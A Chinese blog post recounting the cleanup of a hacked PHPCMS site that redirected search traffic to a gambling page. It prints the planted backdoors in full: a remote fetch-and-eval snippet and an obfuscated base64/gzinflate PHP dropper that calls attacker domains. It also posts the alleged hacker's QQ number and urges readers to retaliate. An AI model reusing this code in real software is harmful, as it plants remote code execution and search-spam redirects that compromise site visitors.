一、修复方式
如果你的phpcms被攻击了,通过百度搜索进入网站的时候,跳转到“×××赌博城”之类的网站,那么可以如下处理:
1、检查phpcms/base.php中,是否被修改。如果修改了,把被加入的东西删除。
我的是被加入了如下代码:
$gif="http://www.imagesspider.com/js.gif";
$str=@ file_get_contents($gif);
eval($str);
2、还有网站根目录下新增了很多php文件。
内容如下:
<?php
error_reporting(0);
set_time_limit(0);
$ref = $_SERVER['HTTP_REFERER'];
if (stristr($ref, 'baidu.com') !== false || stristr($ref, 'sogou.com') !== false|| stristr($ref, 'so.com') !== false || stristr($ref, 'sm.cn') !== false) {
echo '<script src="http://js.baiduspiderjpg.com/js/seo.js" rel="nofollow"></script>';
exit;
}
$url1 = $_SERVER['PHP_SELF'];
$name= substr($url1 ,strrpos($url1 ,'/')+1 );
chmod($name,0444);
$str2="XY7BUoMwGIQfyAuFYulRQQIEFIJNkFvCL7SQpMzIhOLTGw+99LCXnd39toyOK09eMEf03CK64TCLhOs7LfOdnBK/Q6fnNCHyO6kMT8giomXkKN46lzolg0sxFrfiks4f6zx9NUQ2LpGtinciIT0gubTNbISi/X8eh1CdpkLjzx+cvb0boYm06gVLh7J+VZzdbB8kxMfx/qHbBm25ThddTe6BB5u/58xfgc2zUDABy0yu7FYd6FztnMbLzkJVV1zvdf776E2HUFH7Pxge+IdwDJ7+AA==";
$r='s'.chr(11*10+6).'r_repl'.chr(3*33+1-3).'ce';$cc='lchr';
$cc=$r('l','',$cc);
$b=$cc(90*1+8).'ase'.(8*8*1).$cc(2*50-5).'de'.$r(',','c',',').$r(',','od',',').'e';
$g='gzinflate';$str2=$b($str2);$str=$g($str2);
eval("?>".$b($str));?>
把这些文件删除即可。
3、设置目录权限,网站根目录不可写,设置框架php文件不可更改。
4、定期检查网站是否正常。
二、其他网友的方式
1、https://blog.csdn.net/znh_dyt/article/details/77498905
解决办法。
1.前台注册基本的安全考虑 防 sql注入,防XSS,防爆破
2.开启系统自带的短信验证 邮箱验证,这些东东与用户一一对应。
3.缩短用户名的需求,正则 ajax 验证,jq的form验证。
4.加入token。
5.限流 IP 时间段限制。
6.最后不得已来一招 重新部署。
最后 建议能升级还是优先打补丁升级。
2、https://baijiahao.baidu.com/s?id=1628520504298507001&wfr=spider&for=pc
PC的核心文件是根目录下的phpcms文件和phpsso_server文件,这两个文件是PC最重要的地方!只要把这两个文件改名及路径处理,网站ec的安全能提升很多。
三、心酸反黑路
前端时间,我哥和我说,我们的一个网站被黑,百度搜索的时候,显示的是“×××赌博城”的链接。
这个网站挺老了,源码也找不到,phpcms框架的东西也改了不少,也不能直接替换框架来解决问题。
通过跳转跟踪,发现跳转的网页内容是:
<script src="http://js.baiduspiderjpg.com/js/seo.js" rel="nofollow"></script>
关键字搜索“baiduspiderjpg”,发现根目录下type.php等一堆文件是新上传的。删掉以后还是不行。
那只能用最笨的办法,分析代码了。我从index.php开始检查代码,逐个看调用到的代码中是否有类似木马的代码,眼拙的我最开始漏过了bash.php的那几行代码。后来实在找不到,后来突然想到,如果想执行隐蔽代码,必然使用eval方法,全局搜索关键字eval,果然找到了。
当时解决不了的时候又想了其他办法,解决不了问题,那能不能解决造成问题的人呢?
这个黑客为了推广他的黑客程序,在代码中加入qq号推广:
加他QQ先骂了再说,然后他说他是卖黑客程序的,抓住把柄了,举报一波:
什么?举报了才限制加好友?而且只限制了一天。原来是腾讯收了黑钱,人家是SVIP,怪不得。
网警110再举报一波,两天了,结果还没下来。
而且百度上一搜这个qq号,几百页都是被黑的网站,竟然没有人管管这个源头。
如果你是大神,看到这篇文章,是否可以帮忙解决源头的这帮孙子,毕竟我们的警察大人不管屁民的这些事,只会给你打电话,和你说你的网站被黑了啊,自己解决,否则追究你责任。
解决的东西包括:
qq号:499995885
网站:
www.imagesspider.com
js.baiduspiderjpg.com
www.4503774.com:5678